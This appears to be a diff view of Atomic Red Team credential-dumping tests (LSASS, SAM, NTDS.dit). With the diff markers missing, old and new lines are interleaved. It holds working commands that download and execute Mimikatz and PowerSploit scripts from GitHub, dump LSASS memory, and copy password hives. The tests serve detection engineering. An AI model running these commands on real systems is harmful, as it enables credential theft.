| createdump_exe | Path of createdump.exe executable | Path | C:&#92;Program Files&#92;dotnet&#92;shared&#92;Microsoft.NETCore.App&#92;5.*.*&#92;createdump.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
echo "Createdump Path #{createdump_exe}"
$LSASS = tasklist | findstr "lsass"
$FIELDS = $LSASS -split "\s+"
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
```
#### Cleanup Commands:
```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have createdump.exe from .Net 5
##### Check Prereq Commands:
```powershell
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
```
<br/>
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
#{xordump_exe} -out #{output_file} -x 0x41
```
#### Cleanup Commands:
```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have xordump.exe
##### Check Prereq Commands:
```powershell
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
pip3 install pypykatz
```
atomics/T1003.001/T1003.001.yaml
+60 -183
View File
@@ -1,6 +1,56 @@
attack_technique: T1003.001
display_name: "OS Credential Dumping: LSASS Memory"
atomic_tests:
- name: Windows Credential Editor
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
If you see no output it is likely that execution was blocked by Anti-Virus.
If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting data should be placed
type: Path
default: '%temp%\wce-output.txt'
wce_zip_hash:
description: File hash of the Windows Credential Editor zip file
type: String
default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
wce_exe:
description: Path of Windows Credential Editor executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\wce.exe
wce_url:
description: Path to download Windows Credential Editor zip file
type: url
default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
dependency_executor_name: powershell
dependencies:
- description: |
Windows Credential Editor must exist on disk at specified location (#{wce_exe})
prereq_command: |
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
get_prereq_command: |
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
executor:
command: |
#{wce_exe} -o #{output_file}
cleanup_command: del "#{output_file}" >nul 2>&1
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
description: |
@@ -28,7 +78,6 @@ atomic_tests:
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -40,6 +89,7 @@ atomic_tests:
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using comsvcs.dll
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
description: |
@@ -55,6 +105,7 @@ atomic_tests:
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
description: |
@@ -78,7 +129,6 @@ atomic_tests:
prereq_command: |
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
@@ -88,34 +138,6 @@ atomic_tests:
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
description: |
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe)
prereq_command: |
if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe"
executor:
command: |
%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
cleanup_command: |
del "%temp%\nanodump.dmp" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
@@ -150,7 +172,7 @@ atomic_tests:
default: '%tmp%\lsass.DMP'
mimikatz_exe:
description: Path of the Mimikatz binary
type: String
type: string
default: PathToAtomicsFolder\T1003.001\bin\mimikatz.exe
dependency_executor_name: powershell
dependencies:
@@ -160,8 +182,7 @@ atomic_tests:
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
@@ -176,6 +197,7 @@ atomic_tests:
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
name: command_prompt
elevation_required: true
- name: LSASS read with pypykatz
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
description: |
@@ -186,173 +208,28 @@ atomic_tests:
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
if (python --version) {exit 0} else {exit 1}
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
if (pip3 -V) {exit 0} else {exit 1}
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
pypykatz must be installed and part of PATH
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
get_prereq_command: |
pip install pypykatz
pip3 install pypykatz
executor:
command: |
pypykatz live lsa
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Create Mini Dump of LSASS.exe using ProcDump
auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
name: powershell
elevation_required: true
- name: Dump LSASS with .Net 5 createdump.exe
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\dotnet-lsass.dmp
createdump_exe:
description: Path of createdump.exe executable
type: Path
default: 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have createdump.exe from .Net 5
prereq_command: |
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
executor:
command: |
echo "Createdump Path #{createdump_exe}"
$LSASS = tasklist | findstr "lsass"
$FIELDS = $LSASS -split "\s+"
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
supported_platforms:
- windows
input_arguments:
xordump_exe:
description: Path to xordump
type: Path
default: C:\Windows\Temp\xordump.exe
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
dependencies:
- description: |
Computer must have xordump.exe
prereq_command: |
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: |
#{xordump_exe} -out #{output_file} -x 0x41
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
atomics/T1003.002/T1003.002.md
+19 -144
View File
@@ -30,11 +30,7 @@ Notes:
- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
- [Atomic Test #4 - PowerDump Hashes and Usernames from Registry](#atomic-test-4---powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)
<br/>
@@ -48,10 +44,6 @@ Upon successful execution of this test, you will find three files named, sam, sy
**Supported Platforms:** Windows
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
@@ -84,10 +76,6 @@ Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
@@ -101,36 +89,33 @@ pypykatz live registry
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```powershell
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```cmd
```powershell
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```powershell
if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```cmd
```powershell
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```powershell
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```powershell
pip3 install pypykatz
```
@@ -146,14 +131,10 @@ This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | String | SAM|
@@ -169,7 +150,7 @@ esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
#### Cleanup Commands:
```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
del
```
@@ -179,16 +160,12 @@ del #{copy_dest}\#{file_name} >nul 2>&1
<br/>
<br/>
## Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames
Executes a hashdump by reading the hasshes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
@@ -197,117 +174,15 @@ Executes a hashdump by reading the hashes from the registry.
```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "$Env:Temp\PowerDump.ps1"
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Import-Module .\PowerDump.ps1
Invoke-PowerDump
```
#### Dependencies: Run with `powershell`!
##### Description: PowerDump script must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if (Test-Path "$Env:Temp\PowerDump.ps1") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
```
<br/>
<br/>
## Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility
This can be done with a non-admin user account
**Supported Platforms:** Windows
**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
| target_hive | Hive you wish to dump | String | SAM|
| dumped_hive | Name of the dumped hive | String | myhive|
#### Attack Commands: Run with `powershell`!
```powershell
write-host ""
$shadowlist = get-wmiobject win32_shadowcopy
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
```
#### Cleanup Commands:
```powershell
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File
**Supported Platforms:** Windows
**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
| target_hive | Hive you wish to dump | String | SAM|
| dumped_hive | Name of the dumped hive | String | myhive|
#### Attack Commands: Run with `powershell`!
```powershell
write-host ""
$shadowlist = get-wmiobject win32_shadowcopy
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
$mydump = #{dump_path} + '\' + '#{dumped_hive}'
[System.IO.File]::Copy($shadowpath , $mydump)
```
#### Cleanup Commands:
```powershell
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove -ErrorAction Ignore
```
<br/>
atomics/T1003.002/T1003.002.yaml
+12 -86
View File
@@ -28,29 +28,26 @@ atomic_tests:
Parses registry hives to obtain stored credentials
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
if (python --version) {exit 0} else {exit 1}
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
if (pip3 -V) {exit 0} else {exit 1}
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
pypykatz must be installed and part of PATH
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
get_prereq_command: |
pip install pypykatz
pip3 install pypykatz
executor:
command: |
pypykatz live registry
@@ -81,91 +78,20 @@ atomic_tests:
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
name: command_prompt
elevation_required: true
cleanup_command: |
del #{copy_dest}\#{file_name} >nul 2>&1
cleanup_command: del #{copy_dest}\#{file_name} >nul 2>&1
- name: PowerDump Hashes and Usernames from Registry
- name: PowerDump Registry dump of SAM for hashes and usernames
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
description: Executes a hashdump by reading the hashes from the registry.
description: Executes a hashdump by reading the hasshes from the registry.
supported_platforms:
- windows
dependencies:
- description: PowerDump script must exist on disk at specified location
prereq_command: 'if (Test-Path "$Env:Temp\PowerDump.ps1") {exit 0} else {exit 1} '
get_prereq_command: |-
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
executor:
command: |-
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "$Env:Temp\PowerDump.ps1"
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Import-Module .\PowerDump.ps1
Invoke-PowerDump
name: powershell
elevation_required: true
- name: dump volume shadow copy hives with certutil
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
description: |
Dump hives from volume shadow copies with the certutil utility
This can be done with a non-admin user account
supported_platforms:
- windows
input_arguments:
dump_path:
description: Path where the hive will be dumped
type: Path
default: $ENV:temp
target_hive:
description: Hive you wish to dump
type: String
default: SAM
dumped_hive:
description: Name of the dumped hive
type: String
default: myhive
executor:
command: |
write-host ""
$shadowlist = get-wmiobject win32_shadowcopy
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
name: powershell
elevation_required: false
cleanup_command: |
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove -ErrorAction Ignore
- name: dump volume shadow copy hives with System.IO.File
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
description: |
Dump hives from volume shadow copies with System.IO.File
supported_platforms:
- windows
input_arguments:
dump_path:
description: Path where the hive will be dumped
type: Path
default: $ENV:temp
target_hive:
description: Hive you wish to dump
type: String
default: SAM
dumped_hive:
description: Name of the dumped hive
type: String
default: myhive
executor:
command: |
write-host ""
$shadowlist = get-wmiobject win32_shadowcopy
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
$mydump = #{dump_path} + '\' + '#{dumped_hive}'
[System.IO.File]::Copy($shadowpath , $mydump)
name: powershell
elevation_required: false
cleanup_command: |
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove -ErrorAction Ignore
atomics/T1003.003/T1003.003.md
+21 -144
View File
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
<blockquote>Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
In addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
@@ -22,13 +22,9 @@ The following tools and techniques can be used to enumerate the NTDS file and th
- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
- [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi)
- [Atomic Test #5 - Create Volume Shadow Copy with Powershell](#atomic-test-5---create-volume-shadow-copy-with-powershell)
- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl)
- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell)
- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
- [Atomic Test #6 - Create Symlink to Volume Shadow Copy](#atomic-test-6---create-symlink-to-volume-shadow-copy)
<br/>
@@ -41,14 +37,10 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
@@ -67,7 +59,7 @@ vssadmin.exe create shadow /for=#{drive_letter}
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -92,14 +84,10 @@ This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | String | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:&#92;Windows&#92;Temp|
@@ -127,7 +115,7 @@ del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -136,16 +124,16 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```cmd
if not exist #{vsc_name} (exit /b 1)
if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vassadmin'" to fulfuill this requirement
```
##### Description: Extract path must exist
##### Check Prereq Commands:
```cmd
